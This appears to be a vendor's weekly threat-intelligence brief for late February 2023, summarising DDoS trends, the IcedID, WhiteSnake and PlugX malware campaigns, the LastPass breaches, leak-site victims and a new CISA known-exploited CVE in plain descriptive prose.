Cyber Intel Brief: Feb 23 – Mar 01, 2023

Threat Landscape

DDoS Attacks Surge in 2022, Unlikely to Sustain in 2023

Impacted Industries: All

What You Need To Know:

A recent report by the Financial Services Information Sharing and Analysis Center (FS-ISAC) and Akamai reveals a rise in distributed denial of service (DDoS) attacks affecting the financial services sector, increasing 22% since last year. Some attacks are politically motivated and target government websites, private networks, education facilities, and other critical infrastructure entities that have taken sides in geopolitical tensions between Russia and Ukraine, as well as those between China and Taiwan, and the US, Israel, and Iran. Hacktivists have been the primary perpetrators, but recent trends show increased DDoS extortion attacks for financial gain. The report also identifies the rise of DDoS-as-a-Service, where cybercriminals offer their expertise to launch large-scale attacks on behalf of others or provide the cybercriminal access to a panel with DDoS capabilities. While the number of DDoS attacks is unlikely to continue at 2022 levels, they remain a significant threat to the financial sector and other critical infrastructure entities.


New Techniques

New Distribution Method Uses .url File Type and WebDAV to Deliver IcedID

Impacted Industries: All

What You Need To Know:

A recent SANS InfoSec Handler’s Diary entry discloses a new distribution method for IcedID malware using .url files and WebDAV traffic. The malware is delivered when a user clicks on the .url file, which references a URL, launches a website, and an associated .bat file that runs an installer for IcedID using RUNDLL32.exe. The WebDAV activity generates HTTP PROPFIND and GET requests. While post-infection traffic is similar to previous IcedID infections, a GET request to a domain in the .bat file returns a 64-bit DLL that appears to be a decoy file. The file names of the .url and .bat files share the same name, likely to avoid detection, and phishing emails with a purchase order theme may be used to deliver the files. Using .url file types for malware distribution is a new development, and monitoring will continue.


Malware

New InfoStealer Targets Linux and Windows Machines

Impacted Industries: All

What You Need To Know:

Cyble discovered cybercrime forum posts promoting an information-stealing malware dubbed WhiteSnake Stealer, available in versions for both Windows and Linux, capable of gathering a range of sensitive information, including passwords, cookies, credit card numbers, screenshots, and other personal or financial data, sending the stolen data to a Telegram bot. Cyble discovered the malware had been delivered via spam emails with an attachment. The account promoting WhiteSnake Stealer is new and has a low “reputational” score. Due to this, many cybercriminals have likely not used this stealer yet. However, very few stealers can target Linux machines, and this capability may make the stealer more attractive and more prevalent as the stealer gathers more attention and awareness.


Malware

Windows Debugger Tool Still Used to Sideload PlugX

Impacted Industries: All

What You Need To Know:

Trend Micro published a report describing how a cybercriminal used DLL Search Order Hijacking to sideload PlugX malware using the open-source Windows debugging tool x32dbg. The attack chain described in Trend Micro’s report matches the activity detailed in a Sophos report published in late 2020. Based on open-source reporting, one possible initial infection vector could be through phishing emails with attached .iso uncompressed archive files. The cybercriminal’s initial DLL sideloading activity will lead to another file being dropped, initiating another DLL sideloading routine that ultimately leads to a remote command shell that can collect host information, sending it to a command-and-control (C2) server, and monitor for C2 commands.


Data Breach

LastPass Data Breaches Caused by Compromise of Employee Home Computer

Impacted Industries: All

What You Need To Know:

LastPass has disclosed details of two recent data breaches that occurred in August and October of last year. LastPass claims that no product defects or unauthorized access to or abuse of production systems caused either incident. In the first incident, the cybercriminal compromised a software engineer’s corporate laptop (the initial compromise is unknown), allowing them access to source code, technical information, and certain LastPass internal system secrets. In the second incident, the cybercriminal targeted one of the software development and IT operations (DevOps) engineers’ home computers, exploiting a vulnerable third-party media software package to implant keylogger malware, allowing them to access decryption keys that they used to decrypt credentials stolen from the first incident, using them to access and exfiltrate system configuration data, API secrets, third-party integration secrets, and encrypted and unencrypted LastPass customer data. This breach was a well-planned campaign that lasted for 79 days.


Threat Actors

Latest Additions to Data Leak Sites

Impacted Industries: All

What You Need To Know:

In the past week, monitored threat groups added 35 victims to their leak sites. Nineteen of those listed are US-based. Brazil had three, and the United Kingdom and Germany had three victims each listed. The most popular industries were manufacturing, with nine victims, and professional services, with four victims. This information represents victims whom cybercriminals may have successfully attacked but opted not to negotiate or pay a ransom. However, we can not confirm the validity of the cybercriminals’ claims.


Exploited Vulnerabilities

CISA Adds One CVE to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on the evidence of active exploitation, CISA has added CVE-2022-36537 to its Known Exploited Vulnerabilities Catalog. The vulnerability affects ZK Framework’s AuUploader product and allows cybercriminals to retrieve the content of a file located in the web context. Multiple sources routinely report exploiting publicly-facing applications as one of the top initial infection vectors.


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.

Share

LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog